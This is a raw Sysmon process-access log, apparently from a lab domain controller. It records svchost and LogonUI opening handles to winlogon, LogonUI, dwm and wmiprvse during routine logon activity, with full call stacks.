13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.758{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.696{59A5CD1D-93F7-6005-E904-00000000A301}44804904C:\Windows\system32\LogonUI.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.633{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.618{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.618{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.524{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.524{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 